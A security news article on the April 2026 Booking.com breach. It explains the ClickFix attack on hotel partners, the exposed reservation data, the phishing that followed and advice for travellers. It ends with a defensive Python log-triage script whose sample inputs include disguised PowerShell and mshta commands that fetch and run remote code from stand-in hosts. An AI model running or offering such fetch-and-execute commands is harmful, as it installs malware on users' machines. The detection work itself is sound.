Context
On April 13, 2026, Booking.com began notifying customers of a data breach that allowed unauthorised third parties to access reservation data. The platform has over 100 million active users and 500 million monthly visits. The exact scope of the incident has not been disclosed.
Attack Mechanism
The attack did not target Booking.com's systems directly, but its hotel partners. The criminal group Storm-1865, identified by Microsoft, used the ClickFix technique: malicious web pages tricked hotel employees into running a PowerShell command presented as a "technical fix". The resulting malware then compromised the partner accounts connected to the platform.
This attack vector — targeting a supplier to reach its customers — is a supply chain attack, an increasingly common method.
Exposed Data
- Full names
- Email addresses
- Phone numbers
- Postal addresses
- Booking dates and details
- Messages exchanged with hotels through the platform
Banking and financial information was not affected.
Post-Breach Risks
The stolen data enables highly convincing phishing attacks. Reports indicate that travellers received WhatsApp messages before Booking.com's official notification. The messages contained accurate booking details to appear legitimate and requested "payment changes" or "urgent confirmation".
An Australian traveller lost $100 to a scammer posing as Booking.com support a few days before departing for Bali.
What to Do if You Received a Notification
- Ignore any unsolicited messages about your reservation — including WhatsApp, SMS, and email
- Log in directly on the official Booking.com website or app to check your booking
- Do not click any links received in messages about your stay
- Your reservation PIN has been reset by Booking.com — only update it through the official app
- Report any suspicious contact using the official Booking.com form
General Recommendations
- Be wary of last-minute payment requests tied to an existing reservation — no legitimate platform will ask you to pay via WhatsApp
- Use a dedicated email address for travel to limit the impact of any future breach
- Enable two-factor authentication on your Booking.com account
- For hospitality professionals: train your teams to recognise ClickFix techniques — be suspicious of any web page asking you to paste and run a command in the terminal or PowerShell
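For teams that can export command-line history or process-creation logs from front-desk workstations, the following added example (not code from Booking.com, Microsoft, or this article's sources) flags commands that show the traits of a pasted ClickFix "fix". The rule patterns, function names, threshold and sample commands are assumptions constructed for illustration.

```python
import re

# Heuristic traits of a "paste this fix" command line. Patterns are
# illustrative assumptions for this example, not a vendor rule set.
RULES = {
    "script_host": re.compile(r"\b(?:powershell|pwsh|mshta|cmd)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?:^|\s)-w(?:in\w*)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_fetch": re.compile(r"https?://", re.I),
    "inline_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    # Trailing comment that the user sees as reassuring text.
    "decoy_comment": re.compile(r"#[^\n]*\b(?:robot|captcha|verif\w*|human)\b", re.I),
}

def traits(command):
    """Return the names of all heuristic traits present in one command line."""
    # Windows Run-dialog history (RunMRU) values carry a trailing "\1" marker.
    command = re.sub(r"\\1$", "", command.strip())
    return [name for name, rx in RULES.items() if rx.search(command)]

def triage(commands, min_extra=2):
    """Flag commands that start a script host and show >= min_extra other traits."""
    flagged = []
    for cmd in commands:
        found = traits(cmd)
        if "script_host" in found and len(found) - 1 >= min_extra:
            flagged.append((cmd, found))
    return flagged

# Constructed sample input (not taken from the incident); hosts use .invalid.
SAMPLES = [
    r"notepad\1",
    r"cmd /c ipconfig /all",
    r"powershell -File C:\Scripts\backup.ps1",
    r'powershell -w hidden -c "iex (irm https://fix.example.invalid/v)" # I am not a robot - ID 4821\1',
    r"mshta https://cdn.example.invalid/check.hta # Human verification",
]

if __name__ == "__main__":
    for cmd, found in triage(SAMPLES):
        print("REVIEW:", ", ".join(found), "|", cmd)
```

Legitimate installer one-liners that download and execute a script will also be flagged, so treat hits as items for review rather than confirmed compromise.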